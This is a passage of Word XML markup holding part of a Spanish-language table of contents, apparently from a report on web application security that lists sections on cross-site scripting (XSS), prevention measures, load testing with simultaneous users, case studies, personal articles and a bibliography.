          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47619CB9" w14:textId="4791F5F8" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776203" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3.3</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>CROSS-SITE SCRIPTING (XSS)</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776203 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06C633E3" w14:textId="5A8C3589" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1869"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776204" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3.3.1</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>DEFINICION Y MECANISMO</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776204 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7CC1344C" w14:textId="50E8E442" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1869"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776205" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3.3.2</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>TIPOS DE XSS Y SUS MECANISMOS</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776205 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B004797" w14:textId="3A56E7B1" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1869"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776206" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3.3.3</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>MEDIDAS DE PREVENCION</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776206 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74C7289F" w14:textId="3126F620" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776207" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3.4</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>PRUEBAS DE CARGA CON USUARIOS SIMULTANEOS</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776207 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="176E4184" w14:textId="5CAD40AC" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1869"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776208" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3.4.1</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>DEFINICION E IMPORTANCIA</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776208 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7BD43233" w14:textId="297F523F" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1869"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776209" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3.4.2</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>ASPECTOS DE SEGURIDAD EN PRUEBAS DE CARGA</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776209 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1696D926" w14:textId="114B3B72" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1869"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776210" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3.4.3</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>METRICAS CLAVE</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776210 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34153BC8" w14:textId="41A0DAA8" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776211" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>TRES CASOS DE ESTUDIOS</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776211 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DA32B3E" w14:textId="5A9579BF" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776212" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>CASOS DE ESTUDIO</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776212 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67BEBD37" w14:textId="7E305487" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776213" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>ARTICULOS PERSONALES</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776213 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B6DE310" w14:textId="4F695171" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776214" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>BIBLIOGRAFIA</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
